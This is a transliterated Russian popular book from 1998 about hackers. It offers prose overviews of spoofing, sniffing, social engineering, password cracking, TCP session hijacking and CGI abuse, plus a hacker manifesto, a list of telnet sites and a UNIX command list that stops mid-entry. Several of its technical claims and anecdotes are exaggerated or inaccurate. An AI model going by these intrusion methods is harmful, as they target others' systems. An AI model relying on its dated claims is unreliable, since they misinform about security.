Boris Leont'ev. Hakery, vzlomshchiki i drugie informacionnye ubijcy
---------------------------------------------------------------
© Copyright Boris Leont'ev
Home page: http://members.rotfl.com/bobleon/
Email: bobleon@uniinc.msk.ru
---------------------------------------------------------------
BBK 32.973
UDK 681.3
Glavnyj redaktor
Dmitrij Carik
Korrektor
Irina Carik
Hudozhnik-dizajner
Boris Leont'ev
Leont'ev B.
L80 Hakery, vzlomshchiki i drugie informacionnye ubijcy. -- M.:
Poznavatel'naya kniga, 1998. -- 192 s.
ISBN 5-88548-067-2
Ochevidno, chto smysl Seti setej sostoit v razumnosti ogranicheniya kruga
pol'zovatelej togo ili inogo servera. Esli podobnyj server zakuporen
polnost'yu, to i rabotat' mozhet s nim lish' tot, kto ego zakuporil. Poetomu,
lyubaya kompaniya, prezhde chem prinyat' reshenie o vstuplenii v soobshchestvo
Internet, daet sebe otchet v tom, chto sushchestvuet vozmozhnost' proniknoveniya v
svoj glavnyj server nekih postoronnih lic. Vot eti postoronnie lica i
nazyvayutsya hakerami...
Copyright © Boris Leont'ev, 1998.
Copyright © Izdatel'stvo "Poznavatel'naya kniga plyus", 1998.
Copyright © Design Studio M&C, 1998. Oformlenie serii i etoj knigi.
Copyright © Izdatel'stvo "Utro" sovmestno s firmoj "Oleg i Pavel",
1998.
Avtorskie prava na nastoyashchuyu knigu, nazvanie serii "Kratko, dostupno,
prosto" i oformlenie samoj serii prinadlezhat Borisu Leont'evu. Polnoe ili
chastichnoe kopirovanie knigi, a takzhe publikaciya drugih rukopisej v ramkah
etoj serii bez razresheniya pravoobladatelya yavlyaetsya narusheniem avtorskogo
prava i mozhet imet' yuridicheskie posledstviya v sootvetstvii s dejstvuyushchim
zakonodatel'stvom.
Vsya informaciya, opublikovannaya v etoj knige predstavlena v
isklyuchitel'no obrazovatel'nyh celyah, a takzhe dlya povysheniya kvalifikacii
programmistov, sistemnyh administratorov i provajderov Internet. Avtor
preduprezhdaet chitatelej etoj knigi, chto on ne neset nikakoj otvetstvennosti
za te posledstviya, kotorye mogut vozniknut' v rezul'tate provedeniya
eksperimentov s predostavlennoj informaciej.
Vse nazvaniya produktov, upomyanutye v etoj knige, yavlyayutsya tovarnymi
znakami ili zaregistrirovannymi tovarnymi znakami sootvetstvuyushchih
organizacij.
Programmnoe obespechenie, opisannoe v etoj knige, postavlyaetsya
isklyuchitel'no po licenzionnomu dogovoru i mozhet ispol'zovat'sya ili
kopirovat'sya tol'ko v sootvetstvii s usloviyami etogo dogovora. Kopirovanie
etogo programmnogo obespecheniya na kakoj-libo nositel' informacii, esli na
eto net special'nogo razresheniya po licenzionnomu dogovoru, yavlyaetsya
narusheniem Zakona Rossijskoj Federacii "O pravovoj ohrane programm dlya |VM i
baz dannyh" i norm mezhdunarodnogo prava.
LR No 069954 ot 01.12.1991 g. Sdano v nabor 06.07.98. Podpisano v
pechat' 06.09.98. Format 60X84/16.
Bumaga tipografskaya. Garnitura "Newton". Pechat' ofsetnaya. Fiz. pech. l.
12. Tirazh 5 000 ekz. Zakaz 48.
Hacker's Manifest
This is our world now... the world of the electron and the switch, the
beauty of the baud.
We make use of a service already existing without paying for what could
be dirt cheep if it wasn't run by profiteering gluttons, and you call us
criminals. We explore...and you call us criminals. We exist without skin
color, without nationality, without religious bias...and you call us
criminals. You build atomic bombs, wage wars, murder, cheat, and lie to us
and try to make us believe it is for our own good, yet we're the criminals.
Yes, I am a criminal. My crime is that of curiosity. My crime is that
of judging people by what they say and think, not what they look like. My
crime is that of outsmarting you, something that you will never forgive me
for. I am a hacker and this is my manifesto. You may stop this individual,
but you can't stop us all... after all, we're all alike.
Kto takie hakery
Ochevidno, chto smysl Seti setej sostoit v razumnosti ogranicheniya kruga
pol'zovatelej togo ili inogo servera. Esli podobnyj server zakuporen
polnost'yu, to i rabotat' mozhet s nim lish' tot, kto ego zakuporil. Poetomu,
lyubaya kompaniya, prezhde chem prinyat' reshenie o vstuplenii v soobshchestvo
Internet, daet sebe otchet v tom, chto sushchestvuet vozmozhnost' proniknoveniya v
svoj glavnyj server nekih postoronnih lic. Vot eti postoronnie lica i
nazyvayutsya hakerami.
Da, hakery -- eto te, kto vzlamyvayut seti.
Delaetsya eto raznymi sposobami. Naprimer, cherez port terminala ili port
elektronnoj pochty.
Vybrav zhertvu, haker prezhde vsego opredelyaet, imeyutsya li na servere
plohie paroli, ploho nastroennyj soft ili isporchennaya operacionka. Zatem
vybiraetsya metod sobstvennoj bezopasnosti. Samyj rasprostranennyj sposob
proniknut' v set' tak, chtoby ostat'sya nezamechennym -- eto vzlom po cepochke.
Sushchestvuyut tonny programm, posredstvom kotoryh komp'yuter mozhet vesti
poisk parolya cherez perebor nekotorogo slovarya imen. Slozhnee vskryt' set',
esli parol' logina imeet bol'she shesti simvolov, chuvstvitelen k registru ili
soderzhit cifry.
No! V nastoyashchee vremya mnogie seti otkryvayut k sebe dostup cherez
avtomaticheskoe prohozhdenie sistemy parolej. |ta sistema postroena na tak
nazyvaemom fajle parolej. V etom fajle perechislyayutsya dostupnye komp'yutery i
paroli seti. CHto delaet haker? On vlamyvaetsya v set' i skachivaet etot fajl.
Vse!
Drugoj sposob vzloma -- vzlom cherez otladochnye pereklyuchateli
operacionnyh sistem. Kak izvestno eti pereklyuchateli mogut inogda nahodit'sya
vo vklyuchennom sostoyanii. Krome vseh etih vysheperechislennyh pribludov,
konechno zhe, shiroko ispol'zuetsya predvaritel'naya virusnaya ataka.
Vzlomav set', haker zametaet sledy i unichtozhaet vsyu komprometiruyushchuyu
sebya informaciyu. I cherez nekotoroe vremya smatyvaetsya.
Lyuboj kvalificirovannyj haker cherez obyknovennyj faks-modem mozhet
proniknut' dazhe v komp'yuter pravitel'stvennogo uchrezhdeniya i, pri zhelanii,
nastol'ko vnedrit'sya v lyubuyu kak by to ni bylo zashchishchennuyu sistemu, chto
prosto-naprosto razrushit ee. Tak ono i bylo. Dostatochno vspomnit'
zlopoluchnyj segment Milnet seti setej i vsem izvestnuyu labu Rome VMS SSHA.
Da, eto byl nastoyashchij koshmar, kogda odin iz etih chudakov-hakerov tvoril
bezobraziya v techenie nedeli na odnoj iz samyh sekretnyh voennyh baz Ameriki!
Vskryt' set' mozhno i s pomoshch'yu obyknovennogo faks-modema ili dazhe
faks-apparata. Ved' v lyuboj dostatochno krupnoj kompanii faks podklyuchen k
LAN! A eto znachit, chto cherez nomer faksa haker otkryvaet dostup k zavetnomu
shlyuzu. Lyuboj bolee ili menee ser'eznyj (ili dazhe neser'eznyj) haker Internet
orientiruetsya na lokal'nuyu set'. Emu interesen soft zashchity ot
nesankcionirovannogo dostupa. On spit novymi versiyami firewall. On smeetsya
pri upominanii durackogo "brandmauer". Sun! Sun! Sun! Na mir Robin-Gudov
nadvigaetsya sherifovskij Sun! Vse! Vse pogibli! Vse hakery stali sistemnymi
administratorami! Oni ispravilis'. Oni bol'she ne budut...
Da-da, sistemnye administratory utverzhdayut, chto imenno brandmauer i
est' to samoe ustrojstvo, razmeshchennoe mezhdu lokal'noj set'yu i Internet,
pozvolyayushchee raznogo roda pridurkam otstat' ot nashego servera. Vot imenno,
chto tol'ko pridurkam. Nastoyashchim pridurkam! Licezreete paketiki dlya ostanovki
shpionskogo trafika? A haker davno zavladel vsemi funkciyami podtverzhdeniya
polnomochij! Na samom dele haker mozhet sam proverit' vhodnye i vyhodnye
dannye.
Mnogie sisady boyatsya proshchupyvaniya ih hakerami. I mnogie znayut, chto
zakuporka paketov UDP mozhet ostanovit' vskrytie.
Pochemu? Potomu chto srabotaet zashchita! Da, haker blokiruet pakety, a
poetomu lyubye vhody cherez TCP tak zhe blokiruyutsya. No problema v tom, chto v
razrabotke samyh umnyh brandmauerov uchastvuyut te samye hakery! A pochemu by i
net? Pochemu by i ne napisat' kod virusnoj programmy, a potom pridumat'
sootvetstvuyushchij antivirus! Mnogie schitayut, chto vse-taki sushchestvuet
vozmozhnost' vyzvat' mastera, kotoryj postavit stal'nuyu dver' s cvetnym
domofonom. I mnogie nadeyutsya na eti samye brandmauery Internet. |to daleko
ne tak. Da, Firewalls sposobny izolirovat' lokal'nye seti ot vskrytiya iz
Internet posredstvom ekraniruyushchih marshrutizatorov, dvustoronnih shlyuzov i
bar'ernoj host-mashiny. No! Problema v tom, chto eto izvestno kazhdomu hakeru.
|kraniruyushchie marshrutizatory? Prekrasno! Proverka adresa IP i zakuporka
fal'shivogo trafika? A kto govorit, chto eto ne tak? Vse verno! Kuporim
trafik. A kak naschet Telnet i username/password logon?! Terminal Access
Controller Access System? Vklyuchajte! No eto stoit bol'shih deneg.
Mnogie kompanii zashchishchayutsya elektronnymi kartochkami. Poetomu ih
vskryvayut men'she drugih. |to delo dejstvitel'no gramotno skonfigurirovano.
SecurID Card imeet tol'ko tot yuzer, kotoryj imeet pravo dostupa!
Sootvetstvuyushchaya prikladnuha identificiruet istinnost' yuzera cherez dvojnuyu
proverku scheta i personal'nyj kod.
|to vse, dejstvitel'no, horosho, za isklyucheniem teh sluchaev, kogda
prostoj narod podaet v sud. Ne proshche li, gospoda, prosto povesit' trubku?
Pust' vsegda budet zanyato? Ili net?
A mnogie, radi eksperimenta, dopuskayut k svoim setyam hakerov. Rezul'tat
byvaet plachevnym. Hakery pronikayut v massu sekretnyh sistem, poluchayut polnyj
kontrol' i delayut tak, chto ih nikto ne mozhet obnaruzhit' v techenie dolgogo
vremeni.
Hakery pol'zuyutsya oshibkami softa. Oni znayut, chto sistema zarabotaet
sama po sebe i konfidencial'naya informaciya budet kachat'sya tuda, kuda ej
neobhodimo kachat'sya. Byvayut, konechno, i "sluchajnye oshibki". A pochemu by i
net? Mogut byt' v softe takie oshibki. Prednamerennye... Programmnye
zakladki, programmnye zakladki... Hakery ispol'zuyut ih dlya teh ili inyh
operacij na udalennoj mashine. Da, dejstvitel'no, hakery ispol'zuyut eti samye
zakladki v svoih mezhsetevyh mahinaciyah! I esli vasha sistema est' uzel
kommutacii telekommunikacionnoj seti, to hakery mogut raschlenit' set' i
vospol'zovat'sya raschlenennym fajlom parolej. Imenno takim obrazom na Veneru
ne poletel kosmicheskij korabl'! Pochemu? Da potomu, chto operator vmesto
zapyatoj postavil tochku. A kak naschet 100 000 dollarov, kotorye byli
pozaimstvovany nekim anonimnym podlecom vo Vneshekonombanke nerushimoj
respubliki svobodnoj?
Hakery, dejstvitel'no, mogut svesti na net bezopasnost' informacii
lyubogo servera! Kto zhe oni takie? Horoshie programmisty? Byvshie sistemnye
administratory? Obyknovennye studenty? Nigilisty? Oskorblennye yuzery?
Vunderkindy iz komp'yuternoj shkoly?
Metody hakinga: Spufing
Izvestno, chto lyubaya sistema zashchity tipa Firewall pozvolyaet "zhit'"
tol'ko opredelennym adresam IP. |to ves'ma ser'eznoe prepyatstvie dlya
proniknoveniya v set'. Poetomu hakery nashli metod dlya preodoleniya etogo
bar'era - spufing IP. Snachala haker vyyasnyaet, kakie iz adresov IP prohodyat
cherez firewall, zatem ispol'zuet odin iz vychislennyh adresov v kachestve
svoego i takim obrazom poluchaet dostup k sisteme. Vprochem, eto ne vsegda
tak. Naprimer, izvestnaya sistema zashchity FireWall-1 dejstvitel'no daet
vozmozhnost' ustanovit' prozrachnoe podklyuchenie k Internet, ispol'zuya
prakticheski ves' diapazon protokolov mezhsetevogo vzaimodejstviya, obespechiv
pri etom nekotoruyu (tol'ko v tret'ej versii etogo ekrana byla zalatana
dyrka, sidevshaya v kodirovke dannyh i identifikacii klienta-pol'zovatelya)
zashchitu seti. Mnogih administratorov, konechno, raduet intuitivnyj graficheskij
interfejs etoj sistemy, a hakerov pugaet mnogoprotokol'naya proverka paketov
s tak nazyvaemym uchetom sostoyaniya protokola (SMLI), poetomu oni starayutsya
prosto obhodit' seti s FireWall-1, ostaviv spuffing dlya drugoj sistemy.
Mnogie sistemnye administratory schitayut, chto vse-taki sushchestvuet
vozmozhnost' vyzvat' mastera, kotoryj postavit stal'nuyu dver' s cvetnym
domofonom. I mnogie, konechno, nadeyutsya na eti samye brandmauery Internet.
Pozvolyu sebe zametit', chto eto daleko ne tak. Da, Firewalls sposobny
izolirovat' lokal'nye seti ot vskrytiya iz Internet posredstvom ekraniruyushchih
marshrutizatorov, dvustoronnih shlyuzov i bar'ernoj host-mashiny. No! Problema v
tom, chto eto izvestno kazhdomu hakeru. |kraniruyushchie marshrutizatory?
Prekrasno! Proverka adresa IP i zakuporka fal'shivogo trafika? A kto govorit,
chto eto ne tak? Vse verno! Kuporim trafik. A kak naschet Telnet i
username/password logon?! Terminal Access Controller Access System?
Vklyuchajte!
Metody hakinga: Sniffing
Set' TCP/IP -- eto okolo 150 dyrok, skvoz' kotorye otkryvaetsya dostup v
sistemu (TCP/IP -- protokol, cherez kotoryj ustanavlivaetsya isklyuchitel'no
oboyudnoe postoyannoe soedinenie). |to tak i eshche raz tak. I v pervuyu ochered'
potomu, chto lyuboj, kto registriruetsya v seti TCP/IP (cherez telnet ili ftp)
posylaet dannye o svoem parole v obyknovennom IP-pakete. Poetomu, chtoby
poluchit' parol' i login, dostatochno vysledit' podobnyj paket, prihodyashchij na
izvestnyj adres, to est' zahvatit' trafik. Dalee u hakera budet vybor. On
mozhet poluchit' rekvizity chajnika. Togda dostup v sistemu budet ogranichennym.
No esli on poluchit parol' sistemnogo administratora, to smozhet skachat' fajl
parolej vseh pol'zovatelej sistemy.
Sniffing - odin iz samyh populyarnyh metodov vorovstva dannyh v seti
(parolej, imen pol'zovatelej, klyuchej i t.d.) posredstvom special'nogo
programmnogo obespecheniya (tak nazyvaemyh snifferov). Sniffery, kak pravilo,
dostupny lish' sistemnym administratoram, tak kak eti sistemy ves'ma dorogie
i ne po karmanu dazhe samomu krutomu hakeru. Esli sniffer popadaet v ruki
hekera, to on smozhet ves'ma effektivno kontrolirovat' set', zahvativ parol'
i identifikacionnoe imya sistemnogo administratora.
Ataka posredstvom sniffinga ne predusmatrivaet sozdanie sobstvennogo
fal'shivogo adresa IP dlya obmana fil'truyushchej sistemy adresov. I v samom dele,
zachem nuzhen fal'shivyj IP, esli zamedlyaetsya tol'ko skorost' vhodyashchego v
sistemu potoka informacii. |to oznachaet, chto vse mozhno spisat' na plohoe
kachestvo svyazi.
Lider sredi vseh snifferskih liderov -- eto paket IP-Watcher 1.0:
n vyborochnoe otslezhivanie paketov IP.
n zahvat aktivnogo soedineniya.
n zakuporka setevyh soedinenij.
n zakreplenie na udalennoj sisteme.
n preryvanie aktivnogo soedineniya TCP.
n sovmestnoe ispol'zovanie neskol'kih
soedinenij.
n nevozmozhnost' identifikacii
n administrativnym monitoringom.
Samyj smak paketa IP-Watcher zaklyuchaetsya v tom, chto haker mozhet
prodlit' zhizn' soedineniyu posle ego razryva pol'zovatelem. Haker zagonyaet
pol'zovatelya v lovushku. Snachala on zahvatyvaet trafik. Zatem rvet svyaz'.
ZHdet. Pol'zovatel' opyat' vhodit v sistemu i registriruetsya. Parol' u hakera
v karmane.
Vyborochnoe otslezhivanie paketov IP pozvolyaet, naprimer, perehvatyvat'
tol'ko identifikacionnye dannye ili fajly lyubogo komp'yutera, prinadlezhashchie
serveru.
Metody hakinga: Musornye bachki
Hakery chasto issleduyut musornye bachki krupnyh kompanij i inogda nahodyat
scheta za telefonnye peregovory, vnutrennie telefony kompanii, razlichnye
tehnicheskie rukovodstva, nomera kreditnyh kartochek i t.d.
Metody hakinga: Lovlya na durachka
Kazhdyj horoshij haker obladaet prevoshodnymi navykami v iskusstve
pudrit' mozgi. Naprimer, haker mozhet zaruchit'sya doveriem sistemnogo
administratora s tem, chtoby poluchit' dostup k sekretnoj informacii
posredstvom prostogo telefonnogo razgovora, v kotorom on predstavit sebya v
kachestve kakogo-nibud' tehnika-smotritelya.
Metody hakinga: Vzlom parolej
Samyj prostoj put' - intuiciya hakera (nazvaniya pesen, imena akterov).
Bolee slozhnyj - cherez special'nuyu programmu, kotoraya avtomaticheski ishchet
parol' s pomoshch'yu slovarya.
U hakerov imeetsya ogromnoe kolichestvo metodov dlya vyyasneniya parolej i
polucheniya dostupa k setyam. |ti metody var'iruyutsya ot prostyh (zapis' v
otdel'nyj log-fajl nazhatij klaviatury) do izyskanno slozhnyh (deshifrovanie
ogromnyh baz dannyh).
Koshmarnye nochi sistemnyh administratorov
Sysad ne spit. On na rabote. On ne mozhet spat'. A emu tak hochetsya...
Nuzhno skazat', chto v osnovnoj svoej masse sistemnye operatory --
zakorenelye nedalekie pol'zovateli. Imenno iz-za nih i proishodit
bol'shinstvo vzlomov. Net, ne iz-za ih nekommpetentnosti, a skoree iz-za
hamskogo povedeniya etih setepodobnyh lichnostej. Sisasady terpet' ne mogut
pridurkovatost' obyknovennyh yuzerov. Oni ih schitayut nedouchkami. A esli sredi
etih nedouchek popalsya haker!? Pust' poprobuyut? Vot lyudi i probuyut. Probuyut i
u nih poluchaetsya! Sisad smotrit na displej. Rabotaet sisad. A mashina-to
tormozit. Pochemu eto ona tormozit? Net, ne ponyat' eto emu. A gde zhe etot
fajl? A eto, chto za papka? Pochemu etot fajl stal bol'she na sto kilobajt!
Bozhe, kakoj ya durak! Menya vskryli! Ma-a-a-a-a-ma!
Net, sisad ne teryaetsya. Sisad umnyj. Sisad bystro proveryaet fajl
parolej. Fajl parolej! O, maj god! Ego skopirovali! Vot on etot strannyj
vhod. YA nashel! YA zhe govoril, chto nel'zya delat' stol'ko privilegij! Vse, ya
pogib... poshla virusnaya ataka.
I ne pomnit sisad, chto nakanune ves'ma grubo otvechal kakomu-to duraku
po obyknovennomu vojsovomu telefonu. A etot kto-to i okazalsya tem samym
podlym vzlomshchikom. He-he.
Dostup k Internet, Windows 95 i
Russian Online
Itak, u vas imeyutsya modemnyj nomer dostupa (258-4120), imya domena
(online.ru), subnet mask (255.255.255.0), pervyj adres DNS (194.67.1.154) i
vtoroj adres DNS (194.67.1.155).
Poehali nastraivat' Windows. Nazhimaem Network. Vybiraem Configuration.
Udostoveryaemsya, chto prisutstvuyut Dial-up Adapter i TCP/IP. Dalee,
konfiguriruem TCP/IP Dynamic IP Address. Teper' konfiguriruem
sootvetstvuyushchij drajver dlya Windows 95. V papke Control Panel shchelkaem na
Network, dalee na TCP/IP Protocol i Properties. V poyavivshemsya dialoge v IP
Address vybiraem Obtain an IP Address automatically option, v konfiguracii
WINS vybiraem Disable WINS Resolution (kompaniya vseh provajderskih kompanij
Sovam Teleport ne obyazyvaet vvodit' IP-vhodnoj nomer). Ishodya iz poslednih
skobok Client Microsoft Networks ostavlyaem bez izmenenij, a v punkte DNS
Configuration vybiraem opciyu Enable DNS.
Teper' vvodim sobstvennyj localname v pole Host, a v pole Domain
vpisyvaem domenovskoe prostoe i ponyatoe online.ru. V pole DNS Server Search
Order vpisyvaem dogovornyj IP adres servera (194.67.1.154) i nazhimaem knopku
Add. Pole Domain Suffix Search Order ostavlyaem bez izmenenij.
Nakonec, nazhimaem knopku OK, perezagruzhaemsya, vnov' vhodim v Windows
95, otkryvaem My Computer i shchelkaem na ikonke Dial-up Networking. V Make New
Connection vpisyvaem lyuboe nazvanie ikonki. Nazhimaem Configure, popadaem v
dialog General i stavim skorost' raboty v seti.
Dal'nejshie dejstviya dolzhny byt' vam ponyatny. Pomnite, chto v Server Type
v pole Type of Dail-up Server vy dolzhny vybrat' RRR. Pri etom opciya Log on
to network v Advanced Options dolzhna ostat'sya neaktivizirovannoj! Krome
vsego etogo dolbannogo breda obratite vnimanie na opciyu TCP/IP v Allowed
network protocols. |ta chudnaya opciya dolzhna byt' otmechena.
Dalee, konfiguriruem modem dlya avtomaticheskogo nabora v sluchae, esli
liniya zanyata. Iz Dial-up Networking folder vybiraem Connections, zatem
Settings i, nakonec, neobhodimoe kolichestvo soedinenij.
Teper' shchelkaem na sozdannoj piktogramme, vhodim v Connect to i vvodim
UserID v chudakovato-pridurkovom formate UserID@online.ru. Vvodim parol',
nazhimaem Connect, vhodim v sistemu, tykaem na F7 i, ignoriruya dialog
Connected to Dial-up PPP, popadaem v do boli znakomuyu Set'.
Kak stat' hakerom
Dal'she idut shutochki shutochek.
Stat' hakerom ochen' prosto.
Dostatochno vyuchit' i ponyat': matematicheskie discipliny (matematicheskij
analiz, teoriyu funkcij kompleksnogo peremennogo, algebru, geometriyu, teoriyu
veroyatnostej, matematicheskuyu statistiku, matematicheskuyu logiku i diskretnuyu
matematiku), inzhenernye discipliny (fiziku, apparatnye sredstva
vychislitel'noj tehniki, osnovy radioelektroniki, seti svyazi i zashchitu
informacii ot tehnicheskoj razvedki), discipliny po programmirovaniyu i
vychislitel'noj tehnike (informatiku, yazyki programmirovaniya vysokogo urovnya,
metody programmirovaniya, yazyk assemblera, operacionnye sistemy, sistemy
upravleniya bazami dannyh i vychislitel'nye seti), special'nye discipliny
(kriptografiyu i teoreticheskie osnovy zashchity komp'yuternyh sistem).
|to dostatochno polnyj spisok. No esli zhe govorit' o bolee podrobnyh
hakerskih veshchah, to vam neobhodimo znat', chto na svete sushchestvuyut:
n kriptograficheskie metody v sistemah
zashchity gosudarstvennoj,
konfidencial'noj i kommercheskoj
informacii.
n kriptograficheskie metody i sredstva
zashchity i deshifrovaniya informacii.
n matematicheskie metody rascheta
nadezhnosti shifrsistem.
n matematicheskie modeli processov,
voznikayushchie pri zashchite informacii.
n metody resheniya veroyatnostnyh,
statisticheskih i algoritmicheskih zadach
kriptograficheskogo analiza, sinteza
shifrsistem i kriptograficheskih
protokolov.
n metody opredeleniya ugroz bezopasnosti
informacii.
n metody postroeniya matematicheskih
modelej zashchishchaemoj informacii,
shifrov i shifrsistem.
n metody preobrazovaniya informacii
v setyah razlichnogo tipa.
n metody prognozirovaniya ocenok
kriptograficheskoj stojkosti.
n obespechenie nadezhnosti
funkcionirovaniya apparatury
shifrovaniya i testirovaniya
programmno-apparatnyh realizacij
kriptograficheskih algoritmov.
n obshchaya metodologiya kriptograficheskogo
analiza i postroeniya ocenok
kriptograficheskoj stojkosti
shifrsistem.
n opredelenie kanalov utechki informacii
metodikoj izmereniya i rascheta
parametrov opasnyh signalov.
n osnovnye polozheniya teorii
elektricheskih cepej.
n osnovnye principy organizacii sistem
i setej svyazi i osobennosti
sovremennyh setevyh arhitektur.
n osnovnye tipy shifrov, shifrsistem,
kriptograficheskih protokolov i
sposoby vybora sistemy zashchity.
n osobennosti razrabotki i soprovozhdeniya
programmnogo obespecheniya dlya rabochih
grupp i paraprogrammirovaniya.
n principy postroeniya shifrov,
shifrsistem i kriptograficheskih
protokolov.
n tipovye metody kriptograficheskogo
analiza i ocenivaniya
kriptograficheskoj stojkosti.
Haker ili vzlomshchik?
Mnogie dumayut, chto smysl sushchestvovaniya hakerov sostoit v travle
neschastnyh yuzerov Internet. Imenno k takim tipam, navernoe, i otnositsya
Klifford Stoll, vysledivshij chudakov iz Germanii, prodavavshih sekretnuyu
komp'yuternuyu informaciyu kommunistam. Navernoe, on prav. A vot Robert Morris,
avtor znamenitogo chervyaka-razrushitelya, schitaet, navernoe, po drugomu.
CHto zhe mozhet sdelat' prostoj haker? Haker ili vzlomshchik? A est' li mezhdu
nimi raznica? Est' mnenie, chto mnogie virusniki kak raz i pishut antivirusy.
Znachit, est' i hakery-vzlomshchiki ili, net -- vzlomshchiki-hakery. Vprochem, vse
ravno informacionnye ubijcy. Kak zhe eti ubijcy uznayut paroli, vtorgayutsya v
Internet i zarazhayut programmy na urovne protokola peredachi fajlov?
Ispol'zuya osobyj soft, kotoryj vy mozhete skachat' iz Internet, vy mozhete
sami stat' hakerom. Naberite v Yahoo shizofrenicheskoe "crack"...
Vzlom seti
Vozmozhen, naprimer, s pomoshch'yu Internet. Dostatochno pohitit' parol'
cherez udalennyj dostup po protokolam FTP ili Telnet. V etom sluchae u hakera
imeetsya vozmozhnost' perehvatit' trafik i s pomoshch'yu kakoj-nibud' ishchejki
pojmat' identifikatory pol'zovatelej, a esli povezet, to i tonny parolej
togo ili inogo uzla. Zadacha hakera -- poluchit' parol' vysokogo urovnya, to
est' parol' supervizora, i uzhe s pomoshch'yu etoj informacii zahvatit' paroli
vseh ostal'nyh yuzerov uzla.
Haker mozhet vojti v set' v kachestve udalennogo pol'zovatelya pod vidom
proverki elektronnogo pochtovogo yashchika. Kak pravilo, paroli dlya elektronnoj
pochty ves'ma prostye, i inogda poddayutsya rasshifrovke s pervoj popytki.
Hakery-profi primenyayut bolee dejstvennye metody vzloma. Rech' idet ob
ugone soedineniya TCP. Shema prosta. Kak tol'ko real'nyj yuzer
identificiruetsya uzlom, haker pereklyuchaet soedinenie na sebya i peredaet v
ciklicheskom rezhime po TCP ryad cifr do teh por, poka ne poluchaet
posledovatel'nost' nomerov, cherez kotoruyu mozhno podojti k seredine seansa
svyazi, a zatem otkonnektit' yuzera. To est', haker ne tratit zrya vremya na
lomku ves'ma slozhnoj sistemy shifrovaniya ili raskodirovku seansa registracii.
Net! Haker ugonyaet ves' seans registracii.
Haker mozhet takzhe vospol'zovat'sya oshibkami programmnogo obespecheniya
vybrannogo uzla. Oshibki kodov softa, obsluzhivayushchego udalennyh yuzerov -- eto
bezzashchitnye dyrki. Naprimer, znamenityj Netscape Navigator bez
konfigurirovaniya zashchitnyh parametrov ili piratskaya programma dlya chteniya
elektronnyh soobshchenij, ili scenarii (o nih chitajte nizhe) CGI so svobodnym
vhodom.
Voz'mem, naprimer, znamenituyu Microsoft i ee detishche Windows. Mnogie
primenyayut stek TCP/UP etoj sistemy. Kazhdomu zhe hakeru izvestno, chto
dinamicheskaya biblioteka dannyh, otvechayushchaya za etot stek, napisana, myagko
govorya, nekorrektno, to est', pri bol'shom zhelanii haker mozhet po lyubomu iz
protokolov semejstva TCP/IP poluchit' dostup k soderzhimomu vinchestera
vybrannogo hosta.
Dejstviya sistemnogo administratora na hakerskie pribambasy
n unichtozhenie podozritel'nyh ekauntov.
n monitoring sistemy.
n chtenie chuzhoj elektronnoj
korrespondencii.
n otklyuchenie ARP.
n postroenie seti bez NFS.
n ispol'zovanie mashiny bez NetBIOS
nad TCP/IP.
SHlyuzovoj interfejs CGI-BIN
V podavlyayushchem chisle udalennyh komp'yuterov katalog CGI-BIN
zarezervirovan dlya ispolnyaemyh fajlov. |to oznachaet, chto fajly iz etogo
kataloga mogut byt' zapushcheny cherez Web. Obychno v etom kataloge hranyatsya
scenarii na yazyke PERL, kotorye zapuskayutsya na udalennom servere
Web-programmoj CGI (vy prosto nazhimaete knopku Submit, kotoraya
sformirovana kodom formy HTML, napisannym dlya ispolnyaemoj programmy CGI). V
etot katalog, pri bol'shom zhelanii, mozhno pomestit' i drugie fajly, imeyushchie
takoe zhe otnoshenie k obshchemu shlyuzovomu interfejsu, kak i Bill Gejts k
sozdaniyu UNIX.
Gipertekstovyj yazyk predostavlyaet tol'ko informaciyu dlya chteniya, to est'
modificirovat' Web-stranicy mozhet lish' ih avtor. No! Ispol'zuya obshchij
shlyuzovoj interfejs CGI, mozhno dobavlyat' nekotorye operatory HTML v
sgenerirovannuyu stranicu. |to oznachaet, chto vy mozhete zaprosit' informaciyu u
Web-servera, zatem zapustit' poiskovyj soft i poluchit' to, chto vy hotite. Vy
prosto vstavlyaete nuzhnye vam operatory gipertekstovogo yazyka v sushchestvuyushchuyu
Web-stranicu. Vasha zadacha -- najti Web-server, kotoryj ispol'zuet CGI i tem
samym sposobnyj zapuskat' razlichnyj soft.
Fajly obshcheshlyuzovogo interfejsa -- eto ne obyknovennye tekstoviki, eto
vpolne polnocennyj soft (v chastnosti, kogda vy bluzhdaete po Web, vy
ispol'zuete CGI). Soft etot (kak pravilo, kod pishetsya na yazyke scenariev
Perl -- Practical Extraction and Report Language) hranitsya v kataloge
CGI-BIN nuzhnogo vam servera Web. Haker vzlamyvaet server, nahodit etot
katalog, zapuskaet programmu CGI, peredaet ej podgotovlennye im dannye, ona
ih obrabatyvaet, vozvrashchaet na brouzer hakera rezul'tat i, nakonec,
preobrazovyvaet uzhe svoi dannye v nuzhnuyu hakeru gipertekstovuyu stranichku.
Kak eto delaetsya? Haker nazhimaet Submit i brouzer nachinaet rabotat'
soglasno instrukciyam operatora ACTION takim obrazom (proishodit peredacha
klyuchej i znachenij), chto udalennyj komp'yuter zapustit scenarij iz udalennogo
kataloga CGI-BIN. K ispolnyaemym fajlam kataloga CGI-BIN dostup neogranichen.
Poetomu, k primeru, haker mozhet pomestit' v etot katalog programmu chteniya
fajlov parolej ili nebol'shuyu pribludu, pozvolyayushchuyu zamenyat' fajly.
Demony komand
Esli vy hotite ustanovit' svyaz' s udalennym komp'yuterom i zapustit' na
nem demona komandy finger, to poprobujte vstavit' vmesto name simvol kvakvy,
a posle kvakvy ukazat' imya udalennogo komp'yutera ili ego IP-adres (imeetsya
vvidu Telnet). Haker cherez etu zhe kvakvu mozhet zapustit' demona kakoj-nibud'
drugoj komandy. Rech' vsego-navsego idet o sintaksise nekotoryh komand.
Telnetimsya i eshche raz telnetimsya
Mnogie znayut, chto telnet ispol'zuetsya dlya:
n registracii na udalennom komp'yutere.
n ispol'zovaniya softa Internet, v tom
chisle klientskih programm na
udalennom komp'yutere.
n zapuska lyubogo dostupnogo softa na
udalennom komp'yutere.
Haker obrashchaet vnimanie na poslednij iz vysheperechislennyh faktov i na
nizhesleduyushchie telnetovskie sajty:
anarchy-online.com
ntiabbs.ntia.doc.gov
l0pht.com
sfpg.gcomm.com
telnet lust.isca.uiowa.edu port 2600
pcspm2.dar.csiro.au
prince.carleton.ca port 31337
Lyubimye hakerami komandy UNIX
Nizhe my privodim kratkoe opisanie komand UNIX, bez kotoryh etoj
operacionnoj sistemoj nikto by ne pol'zovalsya.
at
Vy ukazyvaete den'/chas kogda vypolnitsya komanda.
batch
Vypolnenie komand v processe zagruzki.
chmod
|toj komandoj vy mozhete izmenit' polnomochiya fajlovogo dostupa.
chown
